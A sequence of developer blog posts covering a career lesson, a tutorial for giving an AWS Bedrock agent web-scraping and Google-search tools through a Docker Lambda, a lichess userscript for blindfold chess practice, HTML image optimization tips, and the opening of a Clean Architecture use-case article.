While working for my last client, we needed to extend an existing feature. We had to import an Excel file with a list of guests into a group event. Think of importing all the guests to a wedding reception at a hotel. > "You only have to add your changes to this existing component. It's already working." That was what our Product Owner told us. I bet you have heard that, too. The next thing we knew was that the "already-working" component had issues. The original [team was laid off](https://canro91.github.io/2023/08/21/OnLayoffs/), and we couldn't get our questions answered or count on them to fix those issues. What was a simple coding task turned out to be a longer one. Weeks later, we were still fixing existing issues. **Before starting to work on top of an "already-working" feature: test it and give a list of existing issues.** Otherwise, those existing issues will appear as bugs in your changes. And people will start asking questions: > "Why are you taking so much time on this? It’s a simple task. It was already working." In my hometown, we have a saying: "Break old, pay new." Lesson learned! Once you touch it, you own it! *** _[Join my free 7-day email course to refactor your software engineering career now.](https://imcsarag.gumroad.com/l/careerlessonsfromthetrenches)_ _Happy coding!_
canro91
1,921,413
Adding Web Scraping and Google Search to AWS Bedrock Agents
Motivation After all of the AWS product announcements at the NYC Summit last week, I...
0
2024-07-17T17:27:07
https://dev.to/b-d055/adding-web-scraping-and-google-search-to-aws-bedrock-agents-55a8
docker, typescript, aws, ai
## Motivation After all of the [AWS product announcements](https://aws.amazon.com/events/summits/new-york/) at the NYC Summit last week, I wanted to start testing out AWS Bedrock Agents more thoroughly for myself. Something clients often ask for is the ability for their LLM workflows to have access to the web. There is a web [scraper example from AWS](https://github.com/build-on-aws/bedrock-agents-webscraper) that covers this, but I wanted to make a version for NodeJS in TypeScript. I also wasn't happy with the Google search capability relying on web scraping, so I swapped it out for the Google custom search API. My solution will also be making use of the AWS CLI and Docker images to make things more consistent. ## Overview (GitHub project available at end of article) Prerequisites: - AWS CLI (v2) - Docker - NodeJS 20.x - AWS Account - Google Custom Search API Key What we want to do is create a Bedrock agent and attach an action group with a Lambda function that can be called by the agent to perform google searches and scrape web content. We'll accomplish this by defining a Lambda function using Docker and then attaching that function to the agent. Tasks: - Write function(s) to perform web scraping and Google search - Build Docker image to test functions locally - Deploy Docker image to AWS ECR - Creating Lambda function using ECR image as source - Set up IAM roles/permissions - Create Bedrock agent to use new Lambda function ## Creating the Lambda function Let's start by defining a Lambda function using Docker. Why use Docker? Usually, I deploy Lambda-based apps using AWS SAM but I wanted to try something different this time. Plus docker images are easier to test with locally (in my experience). We'll start by following the [AWS documentation for deploying a Typescript on NodeJS container image](https://docs.aws.amazon.com/lambda/latest/dg/typescript-image.html). I encourage you to read the AWS docs, but this is what we're going to do to get started (I'm using Node 20.x): ```bash npm init npm install @types/aws-lambda esbuild --save-dev npm install @types/node --save-dev npm install typescript --save-dev ``` Let's also install cheerio since we'll need it for web scraping later: ```bash npm install cheerio ``` Then add a build script to the `package.json` file: ```typescript ... "scripts": { "build": "esbuild index.ts --bundle --minify --sourcemap --platform=node --target=es2020 --outfile=dist/index.js" } ... ``` Create a `Dockerfile`. I modified the example Dockerfile from AWS to use the `nodejs20` as base: ```dockerfile FROM public.ecr.aws/lambda/nodejs:20 as builder WORKDIR /usr/app COPY package.json ./ RUN npm install COPY index.ts ./ RUN npm run build FROM public.ecr.aws/lambda/nodejs:20 WORKDIR ${LAMBDA_TASK_ROOT} COPY --from=builder /usr/app/dist/* ./ CMD ["index.handler"] ``` Great, now create an `index.ts`. Here's the placeholder `index.ts` provided by AWS and is good for testing our setup: ```typescript import { Context, APIGatewayProxyResult, APIGatewayEvent } from 'aws-lambda'; export const handler = async (event: APIGatewayEvent, context: Context): Promise<APIGatewayProxyResult> => { console.log(`Event: ${JSON.stringify(event, null, 2)}`); console.log(`Context: ${JSON.stringify(context, null, 2)}`); return { statusCode: 200, body: JSON.stringify({ message: 'hello world', }), }; }; ``` Build and run the container (name it whatever you like, I used `bedrock-scraper:latest`): ```bash docker build --platform linux/amd64 -t bedrock-scraper:latest . docker run --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest ``` If we did everything properly we should be able to invoke the function and get our test result: ```bash curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{}' ``` And we should see: ```bash {"statusCode":200,"body":"{\"message\":\"hello world\"}"}% ``` Everything's working well! Now we can start writing the "functions" that our agent will eventually use. ## Add the Web Scraper (cheerio) We're going to use [cheerio](https://cheerio.js.org/) to parse the content from websites ("web scraping"). First, we'll add import and typing at the top so we don't forget to return all properties [required by the Bedrock Agent.](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html#agents-lambda-response) ```typescript import { Context, APIGatewayEvent } from 'aws-lambda'; import * as cheerio from 'cheerio'; interface BedrockAgentLambdaEvent extends APIGatewayEvent { function: string; parameters: any[]; actionGroup: string; } interface BedrockResult { messageVersion: string; response: { actionGroup: string; function: string; functionResponse: { responseState?: string; responseBody: any; } } } ... ``` Then we can modify the lambda `handler()` function to accept the new event type and return the new result type: ```typescript ... export const handler = async (event: BedrockAgentLambdaEvent, context: Context): Promise<BedrockResult> => { ... ``` How will our Lambda function know what URL to scrape? It will be passed from the Agent via the Event parameters. Inside our `handler()` we can add the following ```typescript let parameters = event['parameters']; ``` Let's assume the to-be-implemented agent is going to pass us a `url` parameter. Based on [the AWS docs](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html), we can access this parameter like so: ```typescript let url = parameters.find(param => param.name === 'url')?.value || ''; ``` Next, we can get the html content using cheerio: ```typescript const response = await fetch(url); const html = await response.text(); const $ = cheerio.load(html); ``` Now let's parse out all the unnecessary tags and get the website text: ```typescript // Remove extraneous elements $('script, style, iframe, noscript, link, meta, head, comment').remove(); let plainText = $('body').text(); ``` Finally we can return the content in [the format that Bedrock needs](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html#agents-lambda-response): ```typescript let actionResponse = { 'messageVersion': '1.0', 'response': { 'actionGroup': event['actionGroup'] || '', 'function': event['function'] || '', 'functionResponse': { 'responseBody': { 'TEXT': { 'body': '', } } } } }; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'text': plainText, }); return actionResponse; ``` Rebuild and rerun the container to test our changes: ```bash docker build --platform linux/amd64 -t bedrock-scraper:latest . docker run --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest ``` Invoke the scrape function, we need to pass the parameters the same way the agent will, in the format we defined above: ```bash curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{"parameters":[{"name":"url","value":"https://google.com"}]}' ``` We should get back some text that looks like the google home page. ```bash {"messageVersion":"1.0","response":{"actionGroup":"","function":"","functionResponse":{"responseBody":{"TEXT":{"body":"{\"text\":\"Search Images Maps Play YouTube News Gmail Drive More »Web History | Settings | Sign in Advanced searchAdvertisingBusiness SolutionsAbout Google© 2024 - Privacy - Terms \"}"}}}}} ``` Excellent, our web scraping function is setup! Let's move on to the Google search. ## Add the Google Search Tool (custom search API) Before setting up search, you should follow Google's documentation on [creating a search engine](https://developers.google.com/custom-search/v1/introduction#create_programmable_search_engine) and [obtaining an api key](https://developers.google.com/custom-search/v1/introduction#identify_your_application_to_google_with_api_key). With our custom search ID and API key in-hand, it's simple to add a condition for it in our handler. I'm going to refactor the handler function a bit and add a new Google search section: ```typescript export const handler = async (event: BedrockAgentLambdaEvent, context: Context): Promise<BedrockResult> => { let agentFunction = event['function']; let parameters = event['parameters']; let actionResponse = { 'messageVersion': '1.0', 'response': { 'actionGroup': event['actionGroup'] || '', 'function': event['function'] || '', 'functionResponse': { 'responseBody': { 'TEXT': { 'body': '', } } } } }; if (agentFunction === 'scrape') { // get URL from parameters let url = parameters.find(param => param.name === 'url')?.value || ''; if (!url) { actionResponse['response']['functionResponse']['responseState'] = 'FAILURE'; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'error': 'URL not found in parameters', }); return actionResponse; } const response = await fetch(url); const html = await response.text(); const $ = cheerio.load(html); // Remove extraneous elements $('script, style, iframe, noscript, link, meta, head, comment').remove(); let plainText = $('body').text(); console.log({plainText}); // Limit of Lambda response payload is 25KB // https://docs.aws.amazon.com/bedrock/latest/userguide/quotas.html const maxSizeInBytes = 20 * 1024; if (Buffer.byteLength(plainText, 'utf8') > maxSizeInBytes) { while (Buffer.byteLength(plainText, 'utf8') > maxSizeInBytes) { plainText = plainText.slice(0, -1); } plainText = plainText.trim() + '...'; // Add an ellipsis to indicate truncation } console.log({plainText}); actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'text': plainText, }); return actionResponse; } else if (agentFunction === 'google_search') { let query = parameters.find(param => param.name === 'query')?.value || ''; if (!query) { actionResponse['response']['functionResponse']['responseState'] = 'FAILURE'; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'error': 'Query not found in parameters', }); return actionResponse; } const googleParams = { key: process.env.GOOGLE_SEARCH_KEY, cx: process.env.GOOGLE_SEARCH_CX, q: query, }; const queryString = Object.keys(googleParams) .map(key => key + '=' + googleParams[key]) .join('&'); const response = await fetch(`https://www.googleapis.com/customsearch/v1?${queryString}`); const data = await response.json(); if (data.items) { // only return title and link of first 10 results for smaller response payload const results = data.items.map((item: any) => { return { title: item.title, link: item.link, }; }).slice(0, 10); actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'results': results, }); return actionResponse; } else { actionResponse['response']['functionResponse']['responseState'] = 'FAILURE'; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'error': 'No results found', }); return actionResponse; } } else { actionResponse['response']['functionResponse']['responseState'] = 'FAILURE'; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'error': 'Function not found', }); return actionResponse; } }; ``` Interesting changes to point out: - If condition based on the [function name passed to our Lambda](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html) from Bedrock - Use of environment variables instead of hardcoding our Google Search API key and [Custom Search Engine ID](https://programmablesearchengine.google.com/controlpanel/all) - Truncate the response for both `google_search` and `scrape` functions due to [Lambda/Bedrock quota limits](https://docs.aws.amazon.com/bedrock/latest/userguide/quotas.html) - Added some edge cases & error handling Let's test it! Now that we are dealing with API keys as env variables we should pass them in to docker at run time: ```bash docker build --platform linux/amd64 -t bedrock-scraper:latest . docker run -e GOOGLE_SEARCH_KEY=YOUR_SEARCH_KEY -e GOOGLE_SEARCH_CX=YOUR_CX_ID --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest ``` Example cURL to test ```bash curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{"function":"google_search", "parameters":[{"name":"query","value":"safest cities in USA"}]}' ``` My output ```bash {"messageVersion":"1.0","response":{"actionGroup":"","function":"google_search","functionResponse":{"responseBody":{"TEXT":{"body":"{\"results\":[{\"title\":\"The 10 Safest Cities in America | Best States | U.S. News\",\"link\":\"https://www.usnews.com/news/cities/slideshows/safest-cities-in-america\"}... ``` Perfect! Now let's deploy to Lambda so we can start using these functions. ## Deploy Lambda Function Before connecting to Bedrock, we'll need to deploy our lambda function. To do this, we can continue with the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/typescript-image.html) for "Deploying the Image". Start by creating an ECR repository and pushing our image to it. _(Be sure to replace `111122223333` and `us-east-1` with your account ID and region)_ ```bash aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 111122223333.dkr.ecr.us-east-1.amazonaws.com aws ecr create-repository --repository-name bedrock-scraper --region us-east-1 --image-scanning-configuration scanOnPush=true --image-tag-mutability MUTABLE docker tag bedrock-scraper:latest 111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest docker push 111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest ``` Next, create a role for the Lambda function and create the Lambda function itself: _(Remember to replace `111122223333` and `us-east-1` with your account ID and region, `YOUR_SEARCH_KEY` and `YOUR_CX_ID` with your Google search key and CX ID)_ ```bash aws iam create-role \ --role-name lambda-ex \ --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{ "Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"}]}' aws lambda create-function \ --function-name bedrock-scraper \ --package-type Image \ --code ImageUri=111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest \ --role arn:aws:iam::111122223333:role/lambda-ex \ --timeout 30 \ --environment "Variables={GOOGLE_SEARCH_KEY=YOUR_SEARCH_KEY,GOOGLE_SEARCH_CX=YOUR_CX_ID}" ``` After the Lambda is done creating, we can test using the AWS cli to make sure our function works in Lambda: ```bash aws lambda invoke --function-name bedrock-scraper --cli-binary-format raw-in-base64-out --payload '{"function":"google_search", "parameters":[{"name":"query","value":"safest cities in USA"}]}' response.json ``` If we inspect `response.json` it should look something like: ```json { "messageVersion": "1.0", "response": { "actionGroup": "", "function": "google_search", "functionResponse": { "responseBody": { "TEXT": { "body": "{\"results\":[{\"title\":\"The 10 Safest Cities in America | Best States | U.S. News\",\"link\":\"https://www.usnews.com/news/cities/slideshows/safest-cities-in-america\"}..." } } } } } ``` Excellent - now let's expose this capability to a Bedrock agent. ## Add Bedrock Action Group and Permissions We first need to create a basic Bedrock agent. We can do this via the CLI. If you'd like more details on this process see the AWS documentation on [creating a Bedrock agent](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-create.html) and [adding an action group to a Bedrock Agent](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-action-create.html). Start by creating a policy and role for the agent. This allows the agent to invoke the foundation model in Bedrock (Check your account to make sure the model you want is [available in your region](https://docs.aws.amazon.com/bedrock/latest/userguide/models-regions.html)). I'll be naming mine `BedrockAgentInvokeClaude` and applying to a role called `bedrock-agent-service-role`. _(Remember to replace `111122223333` and `us-east-1` with your account ID and region)_ ```bash aws iam create-policy --policy-name BedrockAgentInvokeClaude --policy-document '{"Version":"2012-10-17","Statement":[{"Sid":"VisualEditor0","Effect":"Allow","Action":"bedrock:InvokeModel","Resource":["arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-sonnet-20240229-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-5-sonnet-20240620-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-haiku-20240307-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2:1","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-instant-v1"]}]}' aws iam create-role --role-name bedrock-agent-service-role --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"bedrock.amazonaws.com"},"Action":"sts:AssumeRole","Condition":{"StringEquals":{"aws:SourceAccount":"111122223333"},"ArnLike":{"AWS:SourceArn":"arn:aws:bedrock:us-east-1:111122223333:agent/*"}}}]}' aws iam attach-role-policy --role-name bedrock-agent-service-role --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude ``` Now we can create the Agent using Claude v3 sonnet as the model (you may need to [request access](https://docs.aws.amazon.com/bedrock/latest/userguide/model-access.html) to some models): _(Be sure to use the ARN of your new role from above)_ ```bash aws bedrock-agent create-agent \ --agent-name "scrape-agent" --agent-resource-role-arn arn:aws:iam::111122223333:role/bedrock-agent-service-role \ --foundation-model anthropic.claude-3-sonnet-20240229-v1:0 \ --instruction "You are a helpful agent that can search the web and scrape content. Use the functions available to you to help you answer user questions." ``` Using the `agentArn` of our new agent, give it permission to invoke the lambda function: _(Remember to use your own agent ARN/ID here)_ ```bash aws lambda add-permission \ --function-name bedrock-scraper \ --statement-id bedrock-agent-invoke \ --action lambda:InvokeFunction \ --principal bedrock.amazonaws.com \ --source-arn arn:aws:bedrock:us-east-1:111122223333:agent/999999 ``` Now, using our Lambda ARN from previously, let's add an action group: _(Remember to use your own Lambda ARN and agent ID here)_ ```bash aws bedrock-agent create-agent-action-group \ --agent-id 999999 \ --agent-version DRAFT \ --action-group-executor lambda=arn:aws:lambda:us-east-1:111122223333:function:bedrock-scraper \ --action-group-name "search-and-scrape" \ --function-schema '{"functions": [{"name":"google_search","description":"Search using google","parameters":{"query":{"description":"Query to search on Google","required":true,"type":"string"}}}, {"name":"scrape","description":"Scrape content from a URL","parameters":{"url":{"description":"Valid URL to scrape content from","required":true,"type":"string"}}}]}' ``` Now prepare the agent: _(Remember to use your own agent ID here)_ ```bash aws bedrock-agent prepare-agent --agent-id 999999 ``` Now, FINALLY, we can test our agent. ## Testing It's easy to test the agent using the [AWS console](https://console.aws.amazon.com/bedrock/). Go to **Bedrock** > **Agents** and you should see your new agent. Open it and click **Test**. Ask it a question only an agent with access to the web could answer: ![Bedrock agent test](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rnsklp3yequ14yxu88d9.png) ## Cleanup && Thoughts This was a quick-and-dirty way to get a Bedrock agent up and running. I will eventually turn this into a CloudFormation template to make it easier to deploy (star the GitHub for updates). If you no longer want them, you can delete the Lambda function, ECR image, Bedrock agent, and IAM resources: _(Don't forget to use your own account ID's and ARNs here)_ ```bash aws bedrock-agent delete-agent --agent-id 999999 aws iam detach-role-policy --role-name bedrock-agent-service-role --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude aws iam delete-policy --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude aws iam delete-role --role-name bedrock-agent-service-role aws lambda delete-function --function-name bedrock-scraper aws iam detach-role-policy --role-name lambda-ex --policy-arn arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole aws iam delete-role --role-name lambda-ex aws ecr delete-repository --repository-name bedrock-scraper --force ``` For more information on Bedrock agents and how to use them, see the [AWS documentation](https://docs.aws.amazon.com/bedrock/latest/userguide/what-is-bedrock.html). Full code available on [GitHub](https://github.com/b-d055/bedrock-agents-webscraper-js). Question? Comments? Let me know, I look forward to seeing what you build with Bedrock! You can find me on [LinkedIn](https://www.linkedin.com/in/b-d055/) | CTO & Partner @ [EES](https://www.eesolutions.io/).
b-d055
1,921,416
Yet another attempt to get better at chess
Do you recall that golden period when your chess rating skyrocketed? When you were effortlessly...
0
2024-07-15T03:50:33
https://dev.to/mrdimosthenis/yet-another-attempt-to-get-better-at-chess-5fjm
chess, devtools
Do you recall that golden period when your chess rating skyrocketed? When you were effortlessly conquering opponents who seemed invincible? It felt like you could defeat anyone with just a little extra focus on the next game. Perhaps you even believed that your rating would continue to soar indefinitely. You may have even thought you were one of those rare few who effortlessly transitioned from beginner to expert. Sadly, this is almost never the case. That phase I described usually marks the transition from amateur to club player. It is at this stage that you come to realize that improvement requires effort and dedication. You understand the importance of tactical training, endgame theory, and preparation for different openings, as well as the need for strategic thinking. Not only must you invest countless hours in honing these skills, but you must also develop the intuition to blend them harmoniously. In fact, becoming better at chess requires consistent study. Every now and then, I tend to overlook this truth and delude myself into thinking there must be an easier path. It was during one of these moments of self-deception that I ended up creating the first version of [this](https://github.com/mrdimosthenis/BlindfoldChessTraining) mobile app. After a decade, I've made the decision to make better use of my limited time for chess. To achieve this, I've enabled the Zen mode in [lichess](https://lichess.org) and hidden all ratings. This allowed me to focus on enjoying the game rather than worrying about improvement. ![lichess display options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/842pcgaedm1qob4gelcx.png) But once again, instead of studying chess, I started playing partially-blindfold games. Lichess allows players to use disguised pieces, where their color is visible but their specific figures are not shown. ![disguised pieces](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tbc10l2jfr26jm6q5baz.png) Without the visual cues of the chess pieces, I had to rely on memorizing each position. Although it took some time to adjust, I found that I now make fewer mistakes. It took me a couple of weeks to be able to play with disguised pieces, and I imagine most club players would find it equally manageable. However, I was still starving for a new challenge. Using JavaScript code in the browser's console, I changed all the pieces to white. ![no black piece](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m4jisogidgcktllteqd3.png) Concealing the color of the pieces encourages the mind to imagine the chessboard in more detail. We can aid this process by revealing the last move in the target square. The code below detects the most recent move and presents it in the center of the appropriate square. To ensure visibility, let's lessen the transparency of the pieces. ```javascript document.querySelectorAll("cg-board piece").forEach(piece => { piece.style.opacity = '0.5'; }); const kwdbElements = document.querySelectorAll("kwdb"); const kwdbContent = kwdbElements[kwdbElements.length - 1].innerHTML; const lastMoveSquare = document.querySelector("cg-board square.last-move"); let textSpan = document.createElement('span'); textSpan.innerText = kwdbContent; textSpan.style.color = 'black'; textSpan.style.fontWeight = 'bold'; textSpan.style.fontSize = `${lastMoveSquare.offsetWidth * 0.2}px`; lastMoveSquare.style.display = 'flex'; lastMoveSquare.style.alignItems = 'center'; lastMoveSquare.style.justifyContent = 'center'; lastMoveSquare.appendChild(textSpan); ``` The result looks like this: ![last move notation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wm1tgdt66egreacw2ef9.png) During a chess game, it is necessary to execute the code multiple times. To enable this, we can modify the code, install the [tampermonkey](https://www.tampermonkey.net) browser extension, and configure it for the lichess web pages. Below is the complete tampermonkey script: ```javascript // ==UserScript== // @name Update Lichess Piece Classes and Display kwdb Content // @namespace http://tampermonkey.net/ // @version 0.9 // @description Change piece classes to 'white' and display last kwdb content in last-move square // @author You // @match *://lichess.org/* // @grant none // ==/UserScript== (function() { 'use strict'; let lastKwdbContent = ''; function main() { document.querySelectorAll("cg-board piece").forEach(piece => { let classNames = piece.className.split(' '); if (classNames.length > 0) { classNames[0] = 'white'; piece.className = classNames.join(' '); piece.style.opacity = '0.5'; } }); const kwdbElements = document.querySelectorAll("kwdb"); if (kwdbElements.length > 0) { const kwdbContent = kwdbElements[kwdbElements.length - 1].innerHTML; if (kwdbContent !== lastKwdbContent) { lastKwdbContent = kwdbContent; document.querySelectorAll("cg-board square").forEach(square => { square.innerHTML = ''; }); const lastMoveSquare = document.querySelector("cg-board square.last-move"); if (lastMoveSquare) { let textSpan = document.createElement('span'); textSpan.innerText = kwdbContent; textSpan.style.color = 'black'; textSpan.style.fontWeight = 'bold'; textSpan.style.fontSize = `${lastMoveSquare.offsetWidth * 0.2}px`; lastMoveSquare.style.display = 'flex'; lastMoveSquare.style.alignItems = 'center'; lastMoveSquare.style.justifyContent = 'center'; lastMoveSquare.appendChild(textSpan); } } } } window.addEventListener('load', main); const observer = new MutationObserver(main); observer.observe(document.body, { childList: true, subtree: true }); })(); ``` It works on my computer's Chrome and on my android's Firefox browser. ![it works on my machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8wlohpjz9xwd5fhymdj5.png) After playing thousands of games, I may finally be able to play fully-blindfold chess. Also, by paying attention to the displayed last move, especially on the square names, I may develop the skill to read chess books without needing a chessboard. In the next decade, I should see significant improvement in my chess skills. By the time I reach my 50s, I should become a highly respected player in the chess community. On the other hand, there is always a chance for me to participate physically in a chess tournament, where I will undoubtedly be defeated by players of all skill levels and get forced to face the truth one more time: there is no shortcut, becoming better at chess requires consistent study.
mrdimosthenis
1,921,420
Mastering Image Optimization and Utilization in Web Development
Images are integral to web development, significantly enhancing the visual appeal and user experience...
0
2024-07-13T03:12:06
https://dev.to/mdhassanpatwary/mastering-image-optimization-and-utilization-in-web-development-317a
webdev, learning, productivity, html
Images are integral to web development, significantly enhancing the visual appeal and user experience of websites. However, improper use of images can lead to performance issues, slow loading times, and a poor user experience. This guide will delve into various aspects of using images in web development, covering attributes, optimization techniques, and best practices to ensure your website is both visually appealing and performant. ## Understanding Image Attributes in HTML When embedding images in HTML, several attributes can be utilized to control their behavior and presentation. Here’s a breakdown of the most commonly used attributes: **1. src:** Specifies the path to the image file. ``` <img src="image.jpg" alt="Description of image"> ``` **2. alt:** Provides alternative text for the image, which is crucial for accessibility and SEO. ``` <img src="image.jpg" alt="A beautiful sunset"> ``` **3. width and height:** Define the dimensions of the image. Setting these attributes helps reserve space for the image during page load. ``` <img src="image.jpg" alt="A beautiful sunset" width="600" height="400"> ``` **4. srcset:** Allows you to specify different images for different screen resolutions and sizes, improving responsiveness. ``` <img src="image.jpg" alt="A beautiful sunset" srcset="image-320w.jpg 320w, image-480w.jpg 480w, image-800w.jpg 800w" sizes="(max-width: 600px) 480px, 800px"> ``` **5. sizes:** Works with `srcset` to define how much space the image will take up in different viewport sizes. ``` <img src="image.jpg" alt="A beautiful sunset" srcset="image-320w.jpg 320w, image-480w.jpg 480w, image-800w.jpg 800w" sizes="(max-width: 600px) 480px, 800px"> ``` **6. loading:** Provides lazy loading functionality, which defers the loading of images until they are needed. ``` <img src="image.jpg" alt="A beautiful sunset" loading="lazy"> ``` ## Image Formats and When to Use Them Choosing the right image format is crucial for balancing quality and performance. Here are some common formats: **1. JPEG:** Best for photographs and images with complex colors. It supports lossy compression, reducing file size significantly. ``` <img src="image.jpg" alt="A beautiful sunset"> ``` **2. PNG:** Ideal for images requiring transparency and images with text or sharp edges. It supports lossless compression. ``` <img src="image.png" alt="Logo with transparency"> ``` **3. GIF:** Used for simple animations and images with limited colors. It supports lossless compression. ``` <img src="animation.gif" alt="Loading animation"> ``` **4. SVG:** Perfect for vector graphics, logos, and icons. SVG images are scalable without loss of quality and have smaller file sizes. ``` <img src="vector.svg" alt="Scalable vector graphic"> ``` **5. WebP:** Provides superior compression for both lossless and lossy images, often resulting in smaller file sizes compared to JPEG and PNG. ``` <img src="image.webp" alt="A beautiful sunset"> ``` ## Optimizing Images for Web Performance Optimizing images is essential for improving website performance and user experience. Here are some key optimization techniques: **1. Compression:** Use tools like TinyPNG, ImageOptim, or online services to compress images without losing significant quality. **2. Responsive Images:** Utilize the `srcset` and `sizes` attributes to serve appropriately sized images for different devices and screen resolutions. **3. Lazy Loading:** Implement lazy loading to defer the loading of images that are not immediately visible on the screen, reducing initial page load time. ``` <img src="image.jpg" alt="A beautiful sunset" loading="lazy"> ``` **4. Use Modern Formats:** Adopt modern image formats like WebP to achieve better compression rates while maintaining quality. **5. Serve Scaled Images:** Ensure the image dimensions match the display size to avoid unnecessary scaling by the browser. **6. Content Delivery Network (CDN):** Use a CDN to deliver images faster by distributing them across multiple servers around the globe. **7. Caching:** Leverage browser caching to store images locally on the user's device, reducing the need to re-download them on subsequent visits. **8. Minimize HTTP Requests:** Combine multiple images into a single sprite to reduce the number of HTTP requests. ## Best Practices for Image Use in Web Development **1. Alt Text for Accessibility:** Always provide descriptive alt text for images to improve accessibility for screen readers and enhance SEO. **2. Appropriate File Names:** Use meaningful and descriptive file names for better SEO and maintainability. **3. Keep Aspect Ratio Consistent:** Maintain the aspect ratio of images to avoid distortion and ensure a consistent visual experience. **4. Optimize for Retina Displays:** Provide higher resolution images for devices with high-density displays to ensure sharpness and clarity. **5. Avoid Inline Images:** Refrain from embedding images directly in HTML using base64 encoding, as this can increase page size and load time. **6. Use CSS for Decorative Images:** For purely decorative images, use CSS background images instead of HTML img elements to separate content from presentation. ## Conclusion Images play a vital role in web development, enhancing the visual appeal and user engagement of websites. By understanding and utilizing the various image attributes, formats, and optimization techniques, developers can create visually stunning websites that are also performant and accessible. Embrace best practices and modern tools to ensure your images contribute positively to the overall user experience.
mdhassanpatwary
1,921,460
Building Your First Use Case With Clean Architecture
This is a question I often hear: how do I design my use case with Clean Architecture? I understand...
0
2024-07-16T16:09:10
https://www.milanjovanovic.tech/blog/building-your-first-use-case-with-clean-architecture
cleanarchitecture, usecases, dotnet, mediatr
--- title: Building Your First Use Case With Clean Architecture published: true date: 2024-07-13 00:00:00 UTC tags: cleanarchitecture,usecases,dotnet,mediatr canonical_url: https://www.milanjovanovic.tech/blog/building-your-first-use-case-with-clean-architecture cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g0zoi6zsale20iur9ncp.png --- This is a question I often hear: how do I design my use case with Clean Architecture? I understand the confusion. Figuring out what to place in the Domain, Application, and Infrastructure layer can seem complicated. If that's not enough, we also have to decide what makes up a use case and what should be abstracted away. However, things become simpler if we adhere to the main rule in Clean Architecture — **the Dependency Rule**. This rule states that source code dependencies can only point inwards. In this newsletter, we'll explore a practical example of how to apply Clean Architecture principles by building a user registration feature. ## Clean Architecture [**Clean Architecture**](https://www.milanjovanovic.tech/blog/why-clean-architecture-is-great-for-complex-projects) has emerged as a guiding principle for crafting maintainable, scalable, and testable applications. At its core, Clean Architecture emphasizes the **separation of concerns** and the **dependency rule**. The dependency rule dictates that dependencies should point inward toward higher-level modules. By following this rule, you create a system where the core business logic of your application is decoupled from external dependencies. This makes it more adaptable to changes and easier to test. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y4hhls0a723s8e6638jr.png) The Domain layer encapsulates enterprise-wide business rules. It contains domain entities, where an entity is typically an object with methods. The Application layer contains application-specific business rules and encapsulates all of the system's use cases. A use case orchestrates the flow of data to and from the domain entities and calls the methods exposed by the entities to achieve its goals. The Infrastructure and Presentation layers deal with external concerns. Here, you will implement any abstractions defined in the inner layers. ## Describing The Use Case What does it mean for a user to register with our application? It means they reserve an email address (or username) to identify themselves and be able to interact with our system. The user could provide other information, such as a first and last name, an address, and a phone number. The first step in building any feature is clearly defining the desired result. For user registration, this is what the required operations are: - The user provides an email and password for registration - Verify that the email was not reserved previously by an existing account - Hash the password using some cryptographic hash function (e.g., SHA-256, SHA-512) - Store the user in the database and (optionally) return an access token to the client We could also consider any domain-specific rules or validations that we must enforce. A good example is password strength, where we could implement minimum length and complexity requirements. Now that we have our requirements let's see how to translate them into a use case. ## Implementing the Use Case With our requirements in place, we can now define the user registration use case. In [**Clean Architecture**](https://www.milanjovanovic.tech/blog/clean-architecture-and-the-benefits-of-structured-software-design), use cases live in the Application layer and orchestrate the interactions between domain entities and external dependencies. Let's name our use case `RegisterUser`. Its input will be a `RegistrationRequest` object containing the user's registration data, and its output will be a `RegistrationResult` object indicating the outcome of the registration attempt. Notice that we are using a feature-driven name for the use case. What about any external dependencies? If the use case needs to interact with an external system or infrastructure component, we abstract that behind an interface. Remember, your application's core business logic should be decoupled from external dependencies. The `RegisterUser` class will use dependency injection to get the necessary dependencies: - 